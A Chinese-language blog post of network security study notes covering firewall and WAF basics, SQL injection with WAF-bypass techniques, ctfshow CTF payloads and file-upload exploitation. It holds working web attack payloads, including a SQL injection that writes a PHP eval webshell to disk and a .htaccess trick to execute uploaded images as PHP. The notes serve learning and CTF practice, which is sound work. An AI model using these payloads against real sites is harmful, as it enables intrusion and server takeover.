IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> 网络安全学习笔记 -> 正文阅读

[网络协议]网络安全学习笔记

网络安全学习笔记

基础知识

CDN

CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。

一般来说当你访问的时候,会自动找到一个离你最近的网速最好的cdn节点

但是同时,当你对这个网站请求时,扫出来的仅仅是个一个缓存。只是为了解决网速问题

DNS

域名系统英文Domain Name System,缩写DNS)是互联网的一项服务。它作为将域名IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。DNS使用UDP端口53。当前,对于每一级域名长度的限制是63个字符,域名总长度则不能超过253个字符。

状态码

防火墙 (Firewall)

别名防护墙,于1993发明并引入国际互联网。
他是一项信息安全的防护系统,依照特定的规则,允许或是限制传输的数据通过。在网络中,所谓的防火墙是指一种将内网和外网分开的方法,他实际上是一种隔离技术
防火墙对流经它的网络通信进行扫描, 这样就能够过滤掉一些攻击,以免其在目标计算机上执行。
通常的防火墙主要工作第二到第四层,重心是在网络层,用于过滤IP和协议类型。

WAF (Web Application Firewall) Web应用防火墙

Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略还专门为Web应用提供保护的一款产品。
与传统防火钱不同,WAF工作在应用层。

IDS (Intrusion Detection System) 入侵检测系统

依照一定的安全策略,通过软件、硬件、对网络、系统的运行状况进行监视尽可能的发现各种攻击企图、攻击行为或者攻击结果,以保证网络系统资源的机密性、完整性和可用性。
入侵检测检测可分为实时入侵检测和事后入侵检测。

IPS (Intrusion Prevention System) 入侵预防系统

IPS是对防病毒软件和防火墙的补充,入侵预防系统是一部能够监视网络或网络设备的网络资料传输行为的计算机网络安全设备,能够即时的中断、调整或隔离一些不正常或是具有伤害性的网络资料传输行为。

APT攻击

即高级可持续威胁攻击,也称为定向威胁攻击

TFTP 通过编辑/etc/inetd.conf文件关闭TFTP服务,这个服务太不安全。

RTSP,实时流传输协议,定义了一对多应用程序如何有效地通过IP网络传送多媒体数据。

小迪课程笔记

渗透中你要把IP信息、系统信息、应用信息、版本信息、服务信息、人员信息、防护信息这些尽量收集完整

SQL注入

HTTP参数污染

如果一个网站只在tomcat服务器处做数据过滤和处理,我们可以利用解析参数的不同,对WAF检测进行绕过。

攻击payload:

index.php?id=-1' union select 1,database(),3--+ 

union select…会被tomcat服务器识别为恶意攻击并拦截,而如果payload如下:

攻击payload:

index.php?id=1&id=-1' union select 1,database(),3--+

union select 1,database(),3–+

tomcat服务器检测第一个参数后发现无异常,提交给apache服务器。成功绕过WAF拦截

SQL注释

单行注释  #后面直接加内容

–后面必须加空格

多行注释  /**/中间可跨行

– + 会删除

内联注释是:

MySQL数据库为了保持与其他数据库兼容,特意新添加的功能。 为了避免从MySQL中导出的SQL语句不能被其他数据库使用,它把一些 MySQL特有的语句放在 /*! … */ 中,这些语句在不兼容的数据库中使用时便 不会执行。而MySQL自身却能识别、执行。 /*50001 */表示数据库版本>=5.00.01时中间的语句才会执行。 在SQL注入中,内联注释常用来绕过waf。

/!12345user()/

服务器端连接数据库所使用的用户。

mysql 能16进制识别

execute('sql语句')  //execute函数中可以写sql语句,且为字符串,那么就可以传入一些变形字符串来绕过waf
union  select 1,2,3 只显示一个2  说明只用到了这个字段

SQL注入中一些常用的MySQL函数/语句:

user()          当前用户

database()         当前数据库

current_user()       当前用户名(用于查看权限)

version()         数据库的版本

@@datadir        数据库的路径

load_file()         读文件操作

into outfile() /into dumpfile 写文件操作

SQL注入读写文件的根本条件:

1. 数据库允许导入导出(secure_file_priv)

2. 当前用户用户文件操作权限(File_priv)

#查看数据库是否开启导入导出

show variables like "secure_file_priv";

#查看当前数据库用户

select current_user();

#查看当前用户是否具有文件读写权限

select File_priv from mysql.user where user='root' and host='localhost';

字符串连接函数

concat(str1,str2)函数 直接连接

group_concat(str1,str2)函数 使用逗号做为分隔符

concat_ws(sep,str1,str2)函数  使用第一个参数做为分隔符

基于报错的注入:

1.updatexml函数

2.xpath形式

15种报错函数:

floor()                  multipolygon()

updatexml()                linestring()

extractvalue()              ST_LatFromGeoHash()

exp()                   ST_LongFromGeoHash()

GeometryCollection()          GTID_SUBSET()

polygon()                 GTID_SUBTRACT()

mutipoint()                ST_PointFromGenHash()

multionlinestring()

sql注入读取文件:

写入文件。

url`')) union select 1,'2','<?php @eval($_POST[a]);?>' into outfile 'c:/www/2.php'%23

`虽然提示错误,但还是写入进去了。

读取文件。

url`')) union select 1,2,load_file("C:/WWW/2.php") into outfile 'C:/WWW/3.php'%23

虽然提示错误,但还是可以读取。

file://c:/boot.ini

不会报错,但是页面不正常,可以判断是bool型注入

Fuzz脚本思路

fuzz

SQLmap配合脚本使用

绕过waf拦截中agent思路

请添加图片描述

关于流量拦截思路
爬虫

常见爬虫头

百度爬虫使用

请添加图片描述

延时

请添加图片描述

延时一秒

代理池

SQL实战部分

web171

查表名

payload = "-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+"

查列名

payload="-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+"

查flag

payload="-1'union select id,username,password from ctfshow_user --+"

web172

先看看有无回显

-1' union select 1,2 --+
//检查结果是否有flag
    if($row->username!=='flag'){
      $ret['msg']='查询成功';
    }
      

返回逻辑告诉我们不能有flag字段,所以尝试编码很多啦hex等等,这里用base64吧

-1' union select to_base64(username),hex(password) from ctfshow_user2 --+

最后一行得到flag的hex值

文件上传

请添加图片描述
绕过
绕过

有些时候,不能用抓包来进行绕过上传,因为有些上传是在本地进行,抓不到数据包

.htaccess文件上传解析漏洞

? 编写.htaccess文件。

打开记事本,将如下代码写入文本中:

AddType  application/x-httpd-php    .jpg

然后点击文件选中另存为,编写文件名为.htaccess,选择保存类型为所有文件

.htaccess文件里的代码的含义 是 将上传的文件后缀名为.jpg格式的文件以 php格式来解析文件。

.htaccess文件进行上传,上传成功。

小提示:

  • .htaccess是apache服务器中的一个配置文件,不是上传的文件的黑名单之内 ,所以.htaccess文件是可以上传成功。

把需要上传的php文件后缀改为jpg即可上传

之后可以获取WEBShell权限

上传成功之后,复制上传路径到菜刀链接中

%00截断要php5.3以下(建立在已知文件地址情况下)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-s7Zsf4Bs-1627375988405)(D:\picturre\snipaste\Snipaste_2021-07-27_11-19-07.png)]

解析漏洞

解析

IIS漏洞应用:

请添加图片描述

之后访问图片地址。发现成功以asp执行

请添加图片描述

反之 普通命名还是以正常图片显示

请添加图片描述

常见文件头

JPEG (jpg),  文件头:FFD8FF              
PNG (png),    文件头:89504E47 文件尾:0000000049454E44AE426082
GIF (gif),   文件头:47494638
ZIP Archive (zip), 文件头:504B0304 文件尾:00000000
TIFF (tif),   文件头:49492A00
Windows Bitmap (bmp), 文件头:424D
CAD (dwg), 文件头:41433130
Adobe Photoshop (psd), 文件头:38425053
Rich Text Format (rtf), 文件头:7B5C727466
XML (xml), 文件头:3C3F786D6C
HTML (html), 文件头:68746D6C3E
Email [thorough only] (eml), 文件头:44656C69766572792D646174653A
Outlook Express (dbx), 文件头:CFAD12FEC5FD746F
Outlook (pst), 文件头:2142444E
MS Word/Excel (xls.or.doc), 文件头:D0CF11E0
MS Access (mdb), 文件头:5374616E64617264204A
WordPerfect (wpd), 文件头:FF575043
Adobe Acrobat (pdf), 文件头:255044462D312E
Quicken (qdf), 文件头:AC9EBD8F
Windows Password (pwl), 文件头:E3828596
RAR Archive (rar), 文件头:52617221
Wave (wav), 文件头:57415645
AVI (avi), 文件头:41564920
Real Audio (ram), 文件头:2E7261FD
Real Media (rm), 文件头:2E524D46
MPEG (mpg), 文件头:000001BA
MPEG (mpg), 文件头:000001B3
Quicktime (mov), 文件头:6D6F6F76
Windows Media (asf), 文件头:3026B2758E66CF11
文件头:AC9EBD8F
Windows Password (pwl), 文件头:E3828596
RAR Archive (rar), 文件头:52617221
Wave (wav), 文件头:57415645
AVI (avi), 文件头:41564920
Real Audio (ram), 文件头:2E7261FD
Real Media (rm), 文件头:2E524D46
MPEG (mpg), 文件头:000001BA
MPEG (mpg), 文件头:000001B3
Quicktime (mov), 文件头:6D6F6F76
Windows Media (asf), 文件头:3026B2758E66CF11
MIDI (mid), 文件头:4D546864

更多内容正在记录中,不定期更新学习进度

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2021-07-28 08:11:23  更:2021-07-28 08:13:11 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年3日历 -2024/3/28 18:05:28-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码